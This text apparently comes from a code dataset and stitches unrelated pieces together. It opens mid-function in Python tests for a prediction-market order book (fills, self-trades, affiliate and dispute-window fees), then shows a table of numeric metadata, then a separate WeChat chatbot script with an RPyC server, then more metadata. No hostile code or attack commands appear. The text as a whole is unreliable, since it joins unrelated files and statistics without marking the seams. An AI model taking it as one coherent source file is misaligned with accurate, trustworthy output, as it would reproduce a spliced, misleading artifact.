        orderID = createOrder.publicCreateOrder(ASK, fix(1), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), longTo32Bytes(42), sender=contractsFixture.accounts[1])
    assert orderID
    # fill order with cash using on-chain matcher; return 0 == nothing left unfilled
    with BuyWithCash(cash, fix('1', '60'), contractsFixture.accounts[2], "fill best order"):
        assert trade.publicFillBestOrder(BID, market.address, YES, fix(1), 60, "43", 6, longTo32Bytes(11), sender=contractsFixture.accounts[2]) == 0
    # the resting order must be gone from the book
    assert orders.getAmount(orderID) == 0
    assert orders.getPrice(orderID) == 0
    assert orders.getOrderCreator(orderID) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID) == 0
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
def test_take_best_order_multiple_orders(contractsFixture, cash, market):
    """publicFillBestOrder walks the book and consumes several ASKs at different prices."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    # create orders with cash: 5 ASKs of 1 share each at prices 60..64
    orderIDs = []
    numOrders = 5
    for i in range(numOrders):
        with BuyWithCash(cash, fix('1', 40 - i), contractsFixture.accounts[1], "create order"):
            orderID = createOrder.publicCreateOrder(ASK, fix(1), 60 + i, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), longTo32Bytes(42), sender=contractsFixture.accounts[1])
        assert orderID
        orderIDs.append(orderID)
    # fill orders with cash using on-chain matcher at a limit covering every ask
    price = 60 + numOrders
    with PrintGasUsed(contractsFixture, "fill multiple asks", 0):
        # Fills across orders of differing prices, give it some eth to play with
        assert cash.faucet(fix(numOrders, price), sender=contractsFixture.accounts[1])
        assert trade.publicFillBestOrder(BID, market.address, YES, fix(numOrders), price, "43", 6, longTo32Bytes(11), sender=contractsFixture.accounts[1]) == 0
    # every resting order must be fully removed from the book
    for i in range(numOrders):
        orderID = orderIDs[i]
        assert orders.getAmount(orderID) == 0
        assert orders.getPrice(orderID) == 0
        assert orders.getOrderCreator(orderID) == longToHexString(0)
        assert orders.getOrderMoneyEscrowed(orderID) == 0
        assert orders.getOrderSharesEscrowed(orderID) == 0
        assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
        assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
@mark.parametrize('withSelf', [
    True,
    False
])
def test_take_best_order_with_shares_escrowed_buy_with_cash(withSelf, contractsFixture, cash, market, universe):
    """Fill a shares-escrowed ASK with cash via publicFillBestOrder.

    When withSelf is True the maker and the taker are the same account.
    Fix: the original fetched the ShareToken contract twice and kept two
    identical locals (`sender` / `account`); collapsed to one of each.
    """
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    shareToken = contractsFixture.contracts['ShareToken']
    # buy complete sets so the maker escrows shares instead of cash
    sender = contractsFixture.accounts[2] if withSelf else contractsFixture.accounts[1]
    with BuyWithCash(cash, fix('1', '100'), sender, "buy complete set"):
        assert shareToken.publicBuyCompleteSets(market.address, fix(1), sender=sender)
    assert shareToken.balanceOfMarketOutcome(market.address, 0, sender) == fix(1)
    # create order with shares
    orderID = createOrder.publicCreateOrder(ASK, fix(1), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), longTo32Bytes(42), sender=sender)
    assert orderID
    # fill order with cash using on-chain matcher; return 0 == fully filled
    with PrintGasUsed(contractsFixture, "buy shares escrowed order", 0):
        with BuyWithCash(cash, fix('1', '60'), contractsFixture.accounts[2], "fill best order"):
            assert trade.publicFillBestOrder(BID, market.address, YES, fix(1), 60, "43", 6, longTo32Bytes(11), sender=contractsFixture.accounts[2]) == 0
    # the resting order must be gone from the book
    assert orders.getAmount(orderID) == 0
    assert orders.getPrice(orderID) == 0
    assert orders.getOrderCreator(orderID) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID) == 0
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
def test_take_best_order_with_shares_escrowed_buy_with_shares_categorical(contractsFixture, cash, categoricalMarket, universe):
    """Shares-vs-shares fill on a categorical market settles complete sets and pays out cash.

    Both parties hold complete sets; filling the ASK on outcome 0 trades the
    shares and the resulting complete sets are settled, extracting market and
    reporting fees from the proceeds.
    Fix: the original fetched the ShareToken contract twice.
    """
    market = categoricalMarket
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    shareToken = contractsFixture.contracts['ShareToken']
    # buy complete sets for both users
    numTicks = market.getNumTicks()
    with BuyWithCash(cash, fix('1', numTicks), contractsFixture.accounts[1], "buy complete set"):
        assert shareToken.publicBuyCompleteSets(market.address, fix(1), sender=contractsFixture.accounts[1])
    with BuyWithCash(cash, fix('1', numTicks), contractsFixture.accounts[2], "buy complete set"):
        assert shareToken.publicBuyCompleteSets(market.address, fix(1), sender=contractsFixture.accounts[2])
    assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[1]) == shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[2]) == fix(1)
    assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[1]) == shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[2]) == fix(1)
    assert shareToken.balanceOfMarketOutcome(market.address, 2, contractsFixture.accounts[1]) == shareToken.balanceOfMarketOutcome(market.address, 2, contractsFixture.accounts[2]) == fix(1)
    # create order with shares
    orderID = createOrder.publicCreateOrder(ASK, fix(1), 60, market.address, 0, longTo32Bytes(0), longTo32Bytes(0), longTo32Bytes(42), sender=contractsFixture.accounts[1])
    assert orderID
    # fill order with shares using on-chain matcher; proceeds are the settled
    # complete set value minus market creator and reporting fees
    totalProceeds = fix(1, numTicks)
    totalProceeds -= fix(1, numTicks) / market.getMarketCreatorSettlementFeeDivisor()
    totalProceeds -= fix(1, numTicks) / universe.getOrCacheReportingFeeDivisor()
    expectedTester1Payout = totalProceeds * 60 / numTicks
    expectedTester2Payout = totalProceeds * (numTicks - 60) / numTicks
    with TokenDelta(cash, expectedTester1Payout, contractsFixture.accounts[1], "Tester 1 ETH delta wrong"):
        with PrintGasUsed(contractsFixture, "categoricalFill", 0):
            assert trade.publicFillBestOrder(BID, market.address, 0, fix(1), 60, "43", 6, longTo32Bytes(11), sender=contractsFixture.accounts[2]) == 0
    # maker sold outcome 0; taker's outcome 1/2 shares were settled away
    assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[1]) == 0
    assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[1]) == fix(1)
    assert shareToken.balanceOfMarketOutcome(market.address, 2, contractsFixture.accounts[1]) == fix(1)
    assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[2]) == fix(1)
    assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[2]) == 0
    assert shareToken.balanceOfMarketOutcome(market.address, 2, contractsFixture.accounts[2]) == 0
    # the resting order must be gone from the book
    assert orders.getAmount(orderID) == 0
    assert orders.getPrice(orderID) == 0
    assert orders.getOrderCreator(orderID) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID) == 0
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
def test_trade_with_self(contractsFixture, cash, market, universe):
    """Trading against your own resting BID fills it and creates a remainder order.

    Account 1 bids fix(4) @ 60, then SHORT-trades fix(5) @ 60 against itself:
    the bid is fully filled (OrderEvent eventType 2) and the leftover fix(1)
    becomes a new resting order (OrderEvent eventType 0).
    Fix: dropped the unused `fillOrder` contract lookup and the redundant
    `orderID = None` pre-initialization.
    """
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)

    # create order: account 1 bids 4 shares @ 60
    with BuyWithCash(cash, fix('4', '60'), contractsFixture.accounts[1], "create order"):
        orderID = createOrder.publicCreateOrder(BID, fix(4), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])

    # expected logs: the self-fill of fix(4), then creation of the fix(1) remainder
    orderFilledEventLog = {
        "eventType": 2,
        "addressData": [contractsFixture.accounts[1], contractsFixture.accounts[1]],
        "uint256Data": [60, 0, YES, 0, 0, 0, fix(4), contractsFixture.contracts['Time'].getTimestamp(), 0, 0],
    }
    orderCreatedEventLog = {
        "eventType": 0,
        "addressData": [contractsFixture.accounts[1], nullAddress],
        "uint256Data": [60, fix(1), YES, 0, 0, 0, 0, contractsFixture.contracts['Time'].getTimestamp(), 0, fix(1, 40)],
    }
    with BuyWithCash(cash, fix('5', '40'), contractsFixture.accounts[1], "trade"):
        with AssertLog(contractsFixture, "OrderEvent", orderFilledEventLog):
            with AssertLog(contractsFixture, "OrderEvent", orderCreatedEventLog, skip=1):
                fillOrderID = trade.publicTrade(SHORT, market.address, YES, fix(5), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[1])

    # the original bid was fully consumed and removed from the book
    assert orders.getAmount(orderID) == 0
    assert orders.getPrice(orderID) == 0
    assert orders.getOrderCreator(orderID) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID) == 0
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)

    # the fix(1) remainder rests on the book, owned by the same account
    assert orders.getAmount(fillOrderID) == fix(1)
    assert orders.getPrice(fillOrderID) == 60
    assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[1]
    assert orders.getOrderMoneyEscrowed(fillOrderID) == fix(1, 40)
    assert orders.getOrderSharesEscrowed(fillOrderID) == 0
    assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
def test_trade_with_self_take_order_make_order(contractsFixture, cash, market):
    """Self-trade that both takes a tiny resting ASK and makes a new BID.

    Account 1 has a fix('0.003') ASK @ 40 resting, then bids fix(1) @ 50
    against itself: the ask is taken and the fix('0.997') remainder becomes
    a new resting bid @ 50.
    """
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)
    # create order
    createCost = fix('0.003', '60')
    with BuyWithCash(cash, createCost, contractsFixture.accounts[1], "create order"):
        orderID = createOrder.publicCreateOrder(ASK, fix('0.003'), 40, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
    # fill best order
    takeCost = fix('1', '50')
    with BuyWithCash(cash, takeCost, contractsFixture.accounts[1], "publicTrade"):
        fillOrderID = trade.publicTrade(BID, market.address, YES, fix(1), 50, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[1])
    # the self-owned ask was removed from the book
    assert orders.getAmount(orderID) == 0
    assert orders.getPrice(orderID) == 0
    assert orders.getOrderCreator(orderID) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID) == 0
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
    # the remainder (1 - 0.003 shares) rests as a new bid @ 50
    orderAmount = fix(1) - fix('0.003')
    assert orders.getAmount(fillOrderID) == orderAmount
    assert orders.getPrice(fillOrderID) == 50
    assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[1]
    assert orders.getOrderMoneyEscrowed(fillOrderID) == fix('0.997', 50)
    # Note that we never ended up with the original orders shares. The ETH escrowed for those was simply returned to us for this case.
    assert orders.getOrderSharesEscrowed(fillOrderID) == 0
    assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
@mark.parametrize('isMatch', [
    True,
    False
])
def test_create_order_after_exhausting_book(isMatch, contractsFixture, cash, market):
    """After taking every matchable ASK, the taker's remainder becomes a new order.

    isMatch=True: both resting ASKs (40 and 50) match the 60 bid and the trade
    fully fills. isMatch=False: the second ASK is priced at 70, does not match,
    and the leftover fix(1) rests as a new bid @ 60.
    """
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)
    # create orders
    createCost = fix('1', '60')
    with BuyWithCash(cash, createCost, contractsFixture.accounts[1], "create order"):
        orderID = createOrder.publicCreateOrder(ASK, fix('1'), 40, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
    if isMatch:
        createCost = fix('1', '50')
        with BuyWithCash(cash, createCost, contractsFixture.accounts[1], "create matching order"):
            orderID2 = createOrder.publicCreateOrder(ASK, fix('1'), 50, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
    else:
        createCost = fix('1', '30')
        with BuyWithCash(cash, createCost, contractsFixture.accounts[1], "create non-matching order"):
            orderID2 = createOrder.publicCreateOrder(ASK, fix('1'), 70, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
    # fill best order, isMatch determines if one of the orders
    takeCost = fix('2', '60')
    with BuyWithCash(cash, takeCost, contractsFixture.accounts[0], "trade"):
        fillOrderID = trade.publicTrade(BID, market.address, YES, fix(2), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11))
    # the first ask always matches and is removed from the book
    assert orders.getAmount(orderID) == 0
    assert orders.getPrice(orderID) == 0
    assert orders.getOrderCreator(orderID) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID) == 0
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
    if isMatch:
        # second ask matched too; whole trade filled, no new order (sentinel 1)
        assert orders.getAmount(orderID2) == 0
        assert orders.getPrice(orderID2) == 0
        assert orders.getOrderCreator(orderID2) == longToHexString(0)
        assert orders.getOrderMoneyEscrowed(orderID2) == 0
        assert orders.getOrderSharesEscrowed(orderID2) == 0
        assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
        assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
        assert fillOrderID == longTo32Bytes(1)
    else:
        # second ask (70) untouched; the leftover fix(1) rests as a new bid @ 60
        orderAmount = fix(1)
        assert orders.getAmount(orderID2) == fix(1)
        assert orders.getAmount(fillOrderID) == orderAmount
        assert orders.getPrice(fillOrderID) == 60
        assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[0]
        assert orders.getOrderMoneyEscrowed(fillOrderID) == fix(60)
        assert orders.getOrderSharesEscrowed(fillOrderID) == 0
        assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
        assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
@mark.parametrize(('finalized', 'invalid'), [
    (True, True),
    (False, True),
    (True, False),
    (False, False),
])
def test_fees_from_trades(finalized, invalid, contractsFixture, cash, market, universe):
    """Fee routing for trades: affiliate vs. dispute window, pre/post finalization.

    Covers all four combinations of (market finalized before the trade?,
    finalized as invalid?). The affiliate share is 25% of the creator fee
    minus a 20% source kickback; on an invalid market all collected fees go
    to the next dispute window instead.
    Fix: the original looked the ShareToken contract up twice and kept an
    unused `orders` local.
    """
    affiliates = contractsFixture.contracts['Affiliates']
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    shareToken = contractsFixture.contracts['ShareToken']
    fingerprint = longTo32Bytes(11)
    affiliateAddress = contractsFixture.accounts[3]
    # both traders register account 3 as their affiliate
    affiliates.setReferrer(affiliateAddress, longTo32Bytes(0), sender=contractsFixture.accounts[1])
    affiliates.setReferrer(affiliateAddress, longTo32Bytes(0), sender=contractsFixture.accounts[2])
    if finalized:
        if invalid:
            contractsFixture.contracts["Time"].setTimestamp(market.getDesignatedReportingEndTime() + 1)
            market.doInitialReport([market.getNumTicks(), 0, 0], "", 0)
        else:
            proceedToNextRound(contractsFixture, market)
        disputeWindow = contractsFixture.applySignature('DisputeWindow', market.getDisputeWindow())
        contractsFixture.contracts["Time"].setTimestamp(disputeWindow.getEndTime() + 1)
        assert market.finalize()
    # buy complete sets for both users
    numTicks = market.getNumTicks()
    with BuyWithCash(cash, fix('1', numTicks), contractsFixture.accounts[1], "buy complete set"):
        assert shareToken.publicBuyCompleteSets(market.address, fix(1), sender=contractsFixture.accounts[1])
    with BuyWithCash(cash, fix('1', numTicks), contractsFixture.accounts[2], "buy complete set"):
        assert shareToken.publicBuyCompleteSets(market.address, fix(1), sender=contractsFixture.accounts[2])
    assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[1]) == shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[2]) == fix(1)
    assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[1]) == shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[2]) == fix(1)
    # create order with shares
    orderID = createOrder.publicCreateOrder(ASK, fix(1), 60, market.address, 0, longTo32Bytes(0), longTo32Bytes(0), longTo32Bytes(42), sender=contractsFixture.accounts[1])
    assert orderID
    # affiliate share: 25% of the creator fee, minus the 20% source kickback
    expectedAffiliateFees = fix(100) / 400
    sourceKickback = expectedAffiliateFees / 5
    expectedAffiliateFees -= sourceKickback
    cash.faucet(fix(60), sender=contractsFixture.accounts[2])
    # Trade and specify an affiliate address.
    if finalized:
        if invalid:
            nextDisputeWindowAddress = universe.getOrCreateNextDisputeWindow(False)
            totalFees = fix(100) / 50 # Market fees + reporting fees
            totalFees -= sourceKickback
            with TokenDelta(cash, totalFees, nextDisputeWindowAddress, "Dispute Window did not recieve the correct fees"):
                assert trade.publicFillBestOrder(BID, market.address, 0, fix(1), 60, "43", 6, fingerprint, sender=contractsFixture.accounts[2]) == 0
        else:
            with TokenDelta(cash, expectedAffiliateFees, contractsFixture.accounts[3], "Affiliate did not recieve the correct fees"):
                assert trade.publicFillBestOrder(BID, market.address, 0, fix(1), 60, "43", 6, fingerprint, sender=contractsFixture.accounts[2]) == 0
    else:
        # pre-finalization: two half fills; fees accrue on the market itself
        assert trade.publicFillBestOrder(BID, market.address, 0, fix(0.5), 60, "43", 6, fingerprint, sender=contractsFixture.accounts[2]) == 0
        assert trade.publicFillBestOrder(BID, market.address, 0, fix(0.5), 60, "43", 6, fingerprint, sender=contractsFixture.accounts[2]) == 0
    assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[1]) == 0
    assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[1]) == fix(1)
    # The second user sold the complete set they ended up holding from this transaction, which extracts fees
    assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[2]) == fix(1)
    assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[2]) == 0
    if not finalized:
        # We can confirm that the 3rd test account has an affiliate fee balance of 25% of the market creator fee 1% taken from the 1 ETH order
        assert market.affiliateFeesAttoCash(contractsFixture.accounts[3]) == expectedAffiliateFees
        # The affiliate can withdraw their fees only after the market is finalized as valid
        with raises(TransactionFailed):
            market.withdrawAffiliateFees(contractsFixture.accounts[3])
        if invalid:
            contractsFixture.contracts["Time"].setTimestamp(market.getDesignatedReportingEndTime() + 1)
            market.doInitialReport([market.getNumTicks(), 0, 0], "", 0)
        else:
            proceedToNextRound(contractsFixture, market)
        disputeWindow = contractsFixture.applySignature('DisputeWindow', market.getDisputeWindow())
        contractsFixture.contracts["Time"].setTimestamp(disputeWindow.getEndTime() + 1)
        totalCollectedFees = market.marketCreatorFeesAttoCash() + market.totalPreFinalizationAffiliateFeesAttoCash() + market.validityBondAttoCash()
        nextDisputeWindowAddress = universe.getOrCreateNextDisputeWindow(False)
        nextDisputeWindowBalanceBeforeFinalization = cash.balanceOf(universe.getOrCreateNextDisputeWindow(False))
        assert market.finalize()
        if invalid:
            # invalid finalization: affiliate gets nothing; fees go to the dispute window
            with raises(TransactionFailed):
                market.withdrawAffiliateFees(contractsFixture.accounts[3])
            assert cash.balanceOf(universe.getOrCreateNextDisputeWindow(False)) == nextDisputeWindowBalanceBeforeFinalization + totalCollectedFees
        else:
            with TokenDelta(cash, expectedAffiliateFees, contractsFixture.accounts[3], "Affiliate did not recieve the correct fees"):
                market.withdrawAffiliateFees(contractsFixture.accounts[3])
        # No more fees can be withdrawn
        if not invalid:
            with TokenDelta(cash, 0, contractsFixture.accounts[3], "Affiliate double received fees"):
                market.withdrawAffiliateFees(contractsFixture.accounts[3])
| 56.774044
| 189
| 0.728876
| 5,084
| 48,996
| 6.994296
| 0.052714
| 0.083354
| 0.06215
| 0.026435
| 0.907759
| 0.897072
| 0.884699
| 0.878934
| 0.853624
| 0.83765
| 0
| 0.042404
| 0.150482
| 48,996
| 863
| 190
| 56.774044
| 0.811907
| 0.034105
| 0
| 0.755162
| 0
| 0
| 0.048723
| 0
| 0
| 0
| 0
| 0
| 0.449853
| 1
| 0.032448
| false
| 0
| 0.00885
| 0
| 0.041298
| 0.007375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
385067b378b9582a31531740d33449bb64fc711b
| 8,733
|
py
|
Python
|
bot.py
|
jesson20121020/myRobot
|
667213f6b21ac69dddeff453c4ec663e3e082e73
|
[
"Apache-2.0"
] | 2
|
2016-12-25T14:31:47.000Z
|
2016-12-27T02:30:53.000Z
|
bot.py
|
jesson20121020/myRobot
|
667213f6b21ac69dddeff453c4ec663e3e082e73
|
[
"Apache-2.0"
] | null | null | null |
bot.py
|
jesson20121020/myRobot
|
667213f6b21ac69dddeff453c4ec663e3e082e73
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
from wxbot import *
import json
import math
DEFAULT_WX_ROBOT_SWITCH = True
class WXChatbot(WXBot):
    """WeChat chat bot that answers via AutoReplyMgr and can be toggled on/off by chat commands."""

    def __init__(self):
        WXBot.__init__(self)
        # Master switch; chat commands handled in auto_switch() toggle it at runtime.
        self.robot_switch = DEFAULT_WX_ROBOT_SWITCH

    def auto_switch(self, msg):
        """Toggle the bot when *msg* carries a known start/stop command word."""
        msg_data = msg['content']['data']
        # Chinese command words: "go away / close / rest"-style to stop,
        # "come out / start / work"-style to start.
        stop_cmd = [u'退下', u'走开', u'关闭', u'关掉', u'休息', u'滚开']
        start_cmd = [u'出来', u'启动', u'工作']
        if self.robot_switch:
            if msg_data in stop_cmd:
                self.robot_switch = False
                self.send_msg_by_uid(u'再见,记得想我哦!', msg['to_user_id'])
        else:
            if msg_data in start_cmd:
                self.robot_switch = True
                self.send_msg_by_uid(u'我是可爱的小冰轩,我会得可多了!', msg['to_user_id'])

    def handle_msg_all(self, msg):
        """Dispatch an incoming wxbot message to switch control / auto-reply.

        Fixes vs. the original:
        - The unconditional `if not self.robot_switch: return` made the start
          commands unreachable (auto_switch could never turn the bot back on);
          restored the guard the original had left in a comment, which lets
          type-1 (reply-to-self) control messages through while off.
        - Removed two dead duplicate elif branches whose conditions were
          identical to earlier ones (msg_type_id 4 and 3) and so never ran.
        """
        if not self.robot_switch and msg['msg_type_id'] != 1:
            return
        import AutoReplyMgr
        if msg['msg_type_id'] == 1 and msg['content']['type'] == 0:  # reply to self
            self.auto_switch(msg)
        elif msg['msg_type_id'] == 4 and msg['content']['type'] == 0:  # text message from contact
            reply = AutoReplyMgr.instance().auto_reply(msg['user']['id'], msg['content']['data'])
            if reply:
                self.send_msg_by_uid(reply, msg['user']['id'])
                self.send_img_msg_by_uid('img/1.png', msg['user']['id'])
                self.send_file_msg_by_uid('bot.py', msg['user']['id'])
        elif msg['msg_type_id'] == 3 and msg['content']['type'] == 0:  # group text message
            self.auto_switch(msg)
            if not self.robot_switch:
                return
            if 'detail' in msg['content']:
                # Collect every name the bot may be @-mentioned by in this group.
                my_names = self.get_group_member_name(self.my_account['UserName'], msg['user']['id'])
                if my_names is None:
                    my_names = {}
                if 'NickName' in self.my_account and self.my_account['NickName']:
                    my_names['nickname2'] = self.my_account['NickName']
                if 'RemarkName' in self.my_account and self.my_account['RemarkName']:
                    my_names['remark_name2'] = self.my_account['RemarkName']
                is_at_me = False
                for detail in msg['content']['detail']:
                    if detail['type'] == 'at':
                        for k in my_names:
                            if my_names[k] and my_names[k] == detail['value']:
                                is_at_me = True
                                break
                if is_at_me:
                    # Mentioned directly: prefix the reply with the sender's name.
                    src_name = msg['content']['user']['name']
                    reply = 'to ' + src_name + ': '
                    if msg['content']['type'] == 0:  # text message
                        reply += AutoReplyMgr.instance().auto_reply(msg['content']['user']['id'], msg['content']['desc'])
                    else:
                        reply += u"对不起,只认字,其他杂七杂八的我都不认识,,,Ծ‸Ծ,,"
                    self.send_msg_by_uid(reply, msg['user']['id'])
                else:
                    reply = AutoReplyMgr.instance().auto_reply(msg['content']['user']['id'], msg['content']['desc'])
                    self.send_msg_by_uid(reply, msg['user']['id'])
            else:
                reply = AutoReplyMgr.instance().auto_reply(msg['content']['user']['id'], msg['content']['desc'])
                self.send_msg_by_uid(reply, msg['user']['id'])
# class TulingWXBot(WXBot):
# def __init__(self):
# WXBot.__init__(self)
# self.tuling_key = ""
# self.robot_switch = True
# def auto_switch(self, msg):
# msg_data = msg['content']['data']
# stop_cmd = [u'退下', u'走开', u'关闭', u'关掉', u'休息', u'滚开']
# start_cmd = [u'出来', u'启动', u'工作']
# if self.robot_switch:
# for i in stop_cmd:
# if i == msg_data:
# self.robot_switch = False
# self.send_msg_by_uid(u'[Robot]' + u'bye, remember miss me!', msg['to_user_id'])
# else:
# for i in start_cmd:
# if i == msg_data:
# self.robot_switch = True
# self.send_msg_by_uid(u'[Robot]' + u'I am comming!', msg['to_user_id'])
# def handle_msg_all(self, msg):
# # print 'xdc:::::msg:::', self.robot_switch, msg
# # if not self.robot_switch and msg['msg_type_id'] != 1:
# # return
# # print 'xdc:::::::::', msg
# if msg['msg_type_id'] == 1 and msg['content']['type'] == 0: # reply to self
# self.auto_switch(msg)
# elif msg['msg_type_id'] == 4 and msg['content']['type'] == 0: # text message from contact
# self.send_msg_by_uid(self.tuling_auto_reply(msg['user']['id'], msg['content']['data']), msg['user']['id'])
# elif msg['msg_type_id'] == 3 and msg['content']['type'] == 0: # group text message
# self.auto_switch(msg)
# if not self.robot_switch:
# return
# if 'detail' in msg['content']:
# my_names = self.get_group_member_name(self.my_account['UserName'], msg['user']['id'])
# if my_names is None:
# my_names = {}
# if 'NickName' in self.my_account and self.my_account['NickName']:
# my_names['nickname2'] = self.my_account['NickName']
# if 'RemarkName' in self.my_account and self.my_account['RemarkName']:
# my_names['remark_name2'] = self.my_account['RemarkName']
# is_at_me = False
# for detail in msg['content']['detail']:
# if detail['type'] == 'at':
# for k in my_names:
# if my_names[k] and my_names[k] == detail['value']:
# is_at_me = True
# break
# if is_at_me:
# src_name = msg['content']['user']['name']
# reply = 'to ' + src_name + ': '
# if msg['content']['type'] == 0: # text message
# reply += self.tuling_auto_reply(msg['content']['user']['id'], msg['content']['desc'])
# else:
# reply += u"对不起,只认字,其他杂七杂八的我都不认识,,,Ծ‸Ծ,,"
# self.send_msg_by_uid(reply, msg['user']['id'])
# else:
# reply = self.tuling_auto_reply(msg['content']['user']['id'], msg['content']['desc'])
# self.send_msg_by_uid(reply, msg['user']['id'])
# else:
# reply = self.tuling_auto_reply(msg['content']['user']['id'], msg['content']['desc'])
# self.send_msg_by_uid(reply, msg['user']['id'])
def main():
    """Create the WeChat bot, enable debug output and PNG QR codes, then run it."""
    chatbot = WXChatbot()
    chatbot.conf['qr'] = 'png'   # render the login QR code as a PNG file
    chatbot.DEBUG = True
    chatbot.run()
def rpyc_server():
    """Start a blocking RPyC ThreadedServer exposing remote_call_func on localhost:11111."""
    # Imports stay local so the module can be imported without rpyc installed.
    from rpycserver import remote_call_func
    from rpyc.utils.server import ThreadedServer
    server = ThreadedServer(remote_call_func, hostname='localhost',
                            port=11111, auto_register=False)
    server.start()
print('xdc::::::::::11')  # NOTE(review): leftover debug output emitted at import time -- confirm it is still wanted
if __name__ == '__main__':
    import threading

    # Run the chatbot and the RPyC server concurrently. Both threads are
    # daemons so the process can exit; we block on the RPyC thread to keep
    # the program alive (same lifetime behavior as the original t2.join()).
    bot_thread = threading.Thread(target=main)
    rpc_thread = threading.Thread(target=rpyc_server)
    bot_thread.daemon = True  # .daemon attribute replaces the deprecated setDaemon()
    bot_thread.start()
    rpc_thread.daemon = True
    rpc_thread.start()
    rpc_thread.join()
| 34.113281
| 110
| 0.627047
| 1,328
| 8,733
| 3.89759
| 0.107681
| 0.085008
| 0.063756
| 0.045209
| 0.87558
| 0.853555
| 0.853555
| 0.848532
| 0.834235
| 0.834235
| 0
| 0.006118
| 0.176457
| 8,733
| 255
| 111
| 34.247059
| 0.713154
| 0.417611
| 0
